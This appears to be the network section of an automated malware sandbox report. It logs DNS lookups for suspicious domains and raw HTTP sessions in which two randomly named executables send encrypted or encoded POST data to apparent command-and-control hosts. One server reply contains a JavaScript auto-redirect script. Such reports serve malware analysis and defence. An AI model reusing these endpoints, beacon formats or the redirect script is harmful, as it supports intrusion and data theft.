Jan 11, 2025 03:33:11.312449932 CET | 192.168.2.8 | 1.1.1.1 | 0x376e | Standard query (0) | www.rafconstrutora.online | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:24.502417088 CET | 192.168.2.8 | 1.1.1.1 | 0x8783 | Standard query (0) | www.7vh2wy.top | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:25.495989084 CET | 192.168.2.8 | 1.1.1.1 | 0x8783 | Standard query (0) | www.7vh2wy.top | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:26.511631966 CET | 192.168.2.8 | 1.1.1.1 | 0x8783 | Standard query (0) | www.7vh2wy.top | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:40.531138897 CET | 192.168.2.8 | 1.1.1.1 | 0xb37d | Standard query (0) | www.duwixushx.xyz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 03:29:00.645720005 CET | 1.1.1.1 | 192.168.2.8 | 0x22d | No error (0) | pywolwnvd.biz | | 54.244.188.177 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:29:01.806207895 CET | 1.1.1.1 | 192.168.2.8 | 0xf54f | No error (0) | ssbzmoy.biz | | 18.141.10.107 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:29:37.531527042 CET | 1.1.1.1 | 192.168.2.8 | 0x56e4 | No error (0) | www.nb-shenshi.buzz | | 161.97.142.144 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:29:54.040798903 CET | 1.1.1.1 | 192.168.2.8 | 0xf478 | No error (0) | www.laohub10.net | r0lqcud7.nbnnn.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 03:29:54.040798903 CET | 1.1.1.1 | 192.168.2.8 | 0xf478 | No error (0) | r0lqcud7.nbnnn.xyz | | 23.225.160.132 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:29:54.040798903 CET | 1.1.1.1 | 192.168.2.8 | 0xf478 | No error (0) | r0lqcud7.nbnnn.xyz | | 27.124.4.246 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:29:54.040798903 CET | 1.1.1.1 | 192.168.2.8 | 0xf478 | No error (0) | r0lqcud7.nbnnn.xyz | | 202.79.161.151 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:29:54.040798903 CET | 1.1.1.1 | 192.168.2.8 | 0xf478 | No error (0) | r0lqcud7.nbnnn.xyz | | 23.225.159.42 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:30:07.740356922 CET | 1.1.1.1 | 192.168.2.8 | 0xa812 | No error (0) | www.xcvbj.asia | | 149.88.81.190 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:30:41.876156092 CET | 1.1.1.1 | 192.168.2.8 | 0x5c6 | No error (0) | www.soainsaat.xyz | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 03:30:41.876156092 CET | 1.1.1.1 | 192.168.2.8 | 0x5c6 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 03:30:41.876156092 CET | 1.1.1.1 | 192.168.2.8 | 0x5c6 | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:31:55.318609953 CET | 1.1.1.1 | 192.168.2.8 | 0x6bb | No error (0) | www.amayavp.xyz | | 185.27.134.144 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:32:08.960033894 CET | 1.1.1.1 | 192.168.2.8 | 0x7da6 | No error (0) | www.vayui.top | | 104.21.95.160 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:32:08.960033894 CET | 1.1.1.1 | 192.168.2.8 | 0x7da6 | No error (0) | www.vayui.top | | 172.67.145.234 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:32:22.248383999 CET | 1.1.1.1 | 192.168.2.8 | 0x7094 | No error (0) | www.rgenerousrs.store | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:32:22.248383999 CET | 1.1.1.1 | 192.168.2.8 | 0x7094 | No error (0) | www.rgenerousrs.store | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:32:35.726413012 CET | 1.1.1.1 | 192.168.2.8 | 0x4055 | No error (0) | www.t91rl7.pro | | 154.88.22.101 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:32:49.276887894 CET | 1.1.1.1 | 192.168.2.8 | 0x272c | No error (0) | www.learnwithus.site | | 209.74.77.107 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:02.583733082 CET | 1.1.1.1 | 192.168.2.8 | 0x514c | Server failure (2) | www.cuthethoi.online | none | none | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:11.325858116 CET | 1.1.1.1 | 192.168.2.8 | 0x376e | No error (0) | www.rafconstrutora.online | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:11.325858116 CET | 1.1.1.1 | 192.168.2.8 | 0x376e | No error (0) | www.rafconstrutora.online | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:11.325858116 CET | 1.1.1.1 | 192.168.2.8 | 0x376e | No error (0) | www.rafconstrutora.online | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:11.325858116 CET | 1.1.1.1 | 192.168.2.8 | 0x376e | No error (0) | www.rafconstrutora.online | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:11.325858116 CET | 1.1.1.1 | 192.168.2.8 | 0x376e | No error (0) | www.rafconstrutora.online | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:11.325858116 CET | 1.1.1.1 | 192.168.2.8 | 0x376e | No error (0) | www.rafconstrutora.online | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:11.325858116 CET | 1.1.1.1 | 192.168.2.8 | 0x376e | No error (0) | www.rafconstrutora.online | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:26.989151001 CET | 1.1.1.1 | 192.168.2.8 | 0x8783 | No error (0) | www.7vh2wy.top | | 20.2.249.7 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:26.989177942 CET | 1.1.1.1 | 192.168.2.8 | 0x8783 | No error (0) | www.7vh2wy.top | | 20.2.249.7 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:26.989207029 CET | 1.1.1.1 | 192.168.2.8 | 0x8783 | No error (0) | www.7vh2wy.top | | 20.2.249.7 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:33:40.879465103 CET | 1.1.1.1 | 192.168.2.8 | 0xb37d | No error (0) | www.duwixushx.xyz | | 156.251.17.224 | A (IP address) | IN (0x0001) | false
• pywolwnvd.biz
• ssbzmoy.biz
• www.nb-shenshi.buzz
• www.laohub10.net
• www.xcvbj.asia
• www.soainsaat.xyz
• www.amayavp.xyz
• www.vayui.top
• www.rgenerousrs.store
• www.t91rl7.pro
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49705 | 54.244.188.177 | 80 | 2160 | C:\Users\user\Desktop\1SxKeB4u0c.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:29:00.699383974 CET | 361 | OUT | POST /gprpendvhdrdevgd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Jan 11, 2025 03:29:00.699383974 CET | 802 | OUT | Data Raw: 80 4d 5a 85 01 c3 4f e1 16 03 00 00 c2 c7 e8 dc 06 40 d7 27 01 5b 1a fd 69 6a 78 9e 50 c4 f6 5a c3 35 6c 89 20 7a ed 32 cb 8b ae 4d 1c e4 ee 78 e1 80 7c 52 9f 3d 0a 49 a2 6a 29 54 2a 0c a0 5c ab 48 89 ba 8d ea 6e 4d 7a ac f0 ea f1 bb 47 c9 f2 13
Data Ascii: MZO@'[ijxPZ5l z2Mx|R=Ij)T*\HnMzGifI *Z*SL)^0.6b;k3E&=\NqlDT{qsukNt]]whgXEv6gcq<20?BmRn4},hW[
Jan 11, 2025 03:29:01.402398109 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Jan 2025 02:29:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=02690ebe32d452bb9d794491dc48ddb0|8.46.123.189|1736562541|1736562541|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49706 | 18.141.10.107 | 80 | 2160 | C:\Users\user\Desktop\1SxKeB4u0c.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:29:01.829313040 CET | 358 | OUT | POST /rosecbcswnrlukq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 802
Jan 11, 2025 03:29:01.829334974 CET | 802 | OUT | Data Raw: 3f 13 40 6c c1 67 f9 67 16 03 00 00 c0 e2 fd 7e b1 df 7f 57 91 7f 0b 51 28 e8 cc 7f d9 1a 60 66 17 a3 2e b7 af 4d bb 9f 12 06 a5 11 91 5a 82 01 06 ee 8e 47 8b 2e 32 e7 98 cb 6e 2f ad cf f2 8f 1f 86 64 46 da 1d e2 82 15 33 fa 53 dd 8f 7f 9a e6 35
Data Ascii: ?@lgg~WQ(`f.MZG.2n/dF3S5`}FcmcLZ}#LdC>s|\^^NSXqS*K*A5Yj?*/v-Do3Pdf[K8+$.#ANkiD1T8N8>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.849711161.97.142.144805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:29:37.553262949 CET493OUTGET /xxr1/?3P=ZxaxIFQ&jNn=CTzPrZCB9Fii6KjQQmIrKOWCR/YsuH5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM66l0nHsUGQdUfs4bd2jLDJzuKWSTJW9+MdVSz4bzmf2o9wQ== HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.nb-shenshi.buzz
                                                                            Connection: close
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Jan 11, 2025 03:29:38.153275967 CET1236INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Sat, 11 Jan 2025 02:29:38 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Content-Length: 2966
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "66cce1df-b96"
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                                                                            Jan 11, 2025 03:29:38.153337002 CET | 224 | IN | Data Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                            Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-tex
                                                                            Jan 11, 2025 03:29:38.153345108 CET | 1236 | IN | Data Raw: 74 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 30 37 30 37 30 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 31 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 32 35 65 6d 3b 0a 09 09 09 09 6c 69
                                                                            Data Ascii: t {color: #707070;letter-spacing: -0.01em;font-size: 1.25em;line-height: 20px;}.footer {margin-top: 40px;font-size: 0.7em;}.animate__delay-1s {animation-delay: 1s;}@keyframes fadeIn
                                                                            Jan 11, 2025 03:29:38.153469086 CET | 474 | IN | Data Raw: 2d 32 30 2e 36 33 35 2d 34 36 2d 34 36 2d 34 36 7a 22 0a 09 09 09 09 09 09 09 3e 3c 2f 70 61 74 68 3e 0a 09 09 09 09 09 09 3c 2f 73 76 67 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 63 6c 61 73 73 3d 22 61 6e 69 6d 61 74
                                                                            Data Ascii: -20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found</h1><div class="description-text animate__animated animate__fadeIn animate__delay-1s"><p>Oops! We couldn


                                                                            Session ID: 3
                                                                            Source IP: 192.168.2.8   Source Port: 49713
                                                                            Destination IP: 23.225.160.132   Destination Port: 80
                                                                            PID: 5960
                                                                            Process: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jan 11, 2025 03:29:54.070013046 CET | 751 | OUT | POST /sgdd/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.laohub10.net
                                                                            Origin: http://www.laohub10.net
                                                                            Referer: http://www.laohub10.net/sgdd/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 204
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 71 33 44 38 31 64 48 54 67 48 57 32 6a 59 73 72 6b 77 50 4a 52 64 37 46 6c 50 47 57 48 6e 59 4c 39 47 34 63 70 6d 52 67 66 50 38 6f 4f 32 44 6e 4f 65 5a 41 49 76 79 58 48 2b 62 71 35 46 30 39 4f 72 32 55 78 73 7a 59 59 46 4c 2b 6d 59 51 42 56 62 2b 34 42 68 2f 42 45 78 64 77 73 34 39 68 70 55 33 41 44 31 4a 2b 41 32 56 4b 41 33 39 76 53 76 2b 44 64 2b 67 6a 59 37 72 31 4a 64 71 32 4d 6e 5a 56 4a 69 59 77 69 4f 36 65 39 69 46 77 39 50 64 70 78 6b 76 61 69 2b 6f 73 4d 4f 77 4c 65 70 33 2f 59 46 49 61 69 64 67 4f 66 6c 37 49 6b 79 33 2f 76 47 50 35 6b 65 33 69 56 42 65 59 48 46 5a 56 50 77 67 3d
                                                                            Data Ascii: jNn=q3D81dHTgHW2jYsrkwPJRd7FlPGWHnYL9G4cpmRgfP8oO2DnOeZAIvyXH+bq5F09Or2UxszYYFL+mYQBVb+4Bh/BExdws49hpU3AD1J+A2VKA39vSv+Dd+gjY7r1Jdq2MnZVJiYwiO6e9iFw9Pdpxkvai+osMOwLep3/YFIaidgOfl7Iky3/vGP5ke3iVBeYHFZVPwg=
                                                                            Jan 11, 2025 03:29:54.559122086 CET | 533 | IN | HTTP/1.1 200 OK
                                                                            Server: Apache
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Accept-Ranges: bytes
                                                                            Cache-Control: max-age=86400
                                                                            Age: 1
                                                                            Connection: Close
                                                                            Content-Length: 358
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                            Session ID: 4
                                                                            Source IP: 192.168.2.8   Source Port: 49714
                                                                            Destination IP: 23.225.160.132   Destination Port: 80
                                                                            PID: 5960
                                                                            Process: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jan 11, 2025 03:29:56.612962008 CET | 771 | OUT | POST /sgdd/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.laohub10.net
                                                                            Origin: http://www.laohub10.net
                                                                            Referer: http://www.laohub10.net/sgdd/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 224
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 71 33 44 38 31 64 48 54 67 48 57 32 69 37 30 72 69 54 33 4a 55 39 37 47 37 66 47 57 4f 48 59 50 39 47 30 63 70 6a 31 77 65 36 55 6f 50 53 48 6e 66 76 5a 41 4c 76 79 58 66 75 62 76 7a 6c 30 4d 4f 72 4b 6d 78 74 50 59 59 46 50 2b 6d 63 55 42 55 70 57 37 54 68 2f 44 4d 52 64 32 76 49 39 68 70 55 33 41 44 31 64 55 41 32 64 4b 41 6e 4e 76 53 4c 54 78 44 4f 67 67 52 62 72 31 65 4e 71 79 4d 6e 5a 6a 4a 6e 41 61 69 4d 43 65 39 67 4e 77 39 65 64 75 34 6b 75 52 6d 2b 70 62 43 4f 64 42 66 61 37 6a 51 6b 73 71 38 62 6b 52 58 7a 4b 69 2b 51 2f 35 73 47 6e 53 6b 64 66 55 51 32 44 77 64 6d 4a 6c 52 6e 30 2f 32 6d 6c 76 4c 56 63 2b 43 6b 67 77 30 62 6a 33 4c 6b 69 6d
                                                                            Data Ascii: jNn=q3D81dHTgHW2i70riT3JU97G7fGWOHYP9G0cpj1we6UoPSHnfvZALvyXfubvzl0MOrKmxtPYYFP+mcUBUpW7Th/DMRd2vI9hpU3AD1dUA2dKAnNvSLTxDOggRbr1eNqyMnZjJnAaiMCe9gNw9edu4kuRm+pbCOdBfa7jQksq8bkRXzKi+Q/5sGnSkdfUQ2DwdmJlRn0/2mlvLVc+Ckgw0bj3Lkim
                                                                            Jan 11, 2025 03:29:57.143776894 CET | 533 | IN | HTTP/1.1 200 OK
                                                                            Server: Apache
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Accept-Ranges: bytes
                                                                            Cache-Control: max-age=86400
                                                                            Age: 1
                                                                            Connection: Close
                                                                            Content-Length: 358
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                            Session ID: 5
                                                                            Source IP: 192.168.2.8   Source Port: 49715
                                                                            Destination IP: 23.225.160.132   Destination Port: 80
                                                                            PID: 5960
                                                                            Process: C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Jan 11, 2025 03:29:59.158823967 CET | 1788 | OUT | POST /sgdd/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.laohub10.net
                                                                            Origin: http://www.laohub10.net
                                                                            Referer: http://www.laohub10.net/sgdd/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 1240
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 71 33 44 38 31 64 48 54 67 48 57 32 69 37 30 72 69 54 33 4a 55 39 37 47 37 66 47 57 4f 48 59 50 39 47 30 63 70 6a 31 77 65 38 4d 6f 50 6e 54 6e 4e 38 78 41 4b 76 79 58 54 4f 62 75 7a 6c 30 52 4f 72 6a 74 78 74 43 6a 59 47 6e 2b 70 5a 41 42 54 59 57 37 4a 78 2f 44 54 68 64 7a 73 34 38 6a 70 56 61 4a 44 31 4e 55 41 32 64 4b 41 6b 56 76 62 2f 2f 78 42 4f 67 6a 59 37 72 35 4a 64 72 58 4d 6d 78 7a 4a 6d 51 67 6a 34 2b 65 2b 41 64 77 2b 73 31 75 33 6b 75 54 71 65 70 44 43 4f 52 43 66 61 6d 59 51 6b 59 54 38 63 6f 52 48 6b 50 6e 6b 6a 37 67 34 56 6e 63 68 61 66 5a 5a 30 54 73 53 46 70 58 53 31 74 65 34 79 68 46 46 46 49 67 47 55 64 41 31 63 7a 33 46 55 66 57 2b 76 48 35 76 73 49 78 4e 2f 33 54 52 7a 4f 6a 6d 6c 59 32 6e 6f 5a 70 62 48 48 36 30 71 4d 31 54 76 6c 32 6d 4d 4a 2f 6c 49 61 68 6a 43 73 4c 65 5a 37 38 75 45 53 68 51 39 6c 44 2b 52 45 5a 43 5a 64 4d 50 2b 36 53 36 56 4c 59 58 62 34 49 2f 42 61 55 43 6c 2f 73 4a 45 74 43 78 6e 32 4d 57 54 31 32 76 74 31 35 38 75 4e 6b 53 52 52 73 6f 44 [TRUNCATED]
                                                                            Data Ascii: jNn= [TRUNCATED]
                                                                            Jan 11, 2025 03:29:59.683837891 CET | 533 | IN | HTTP/1.1 200 OK
                                                                            Server: Apache
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Accept-Ranges: bytes
                                                                            Cache-Control: max-age=86400
                                                                            Age: 1
                                                                            Connection: Close
                                                                            Content-Length: 358
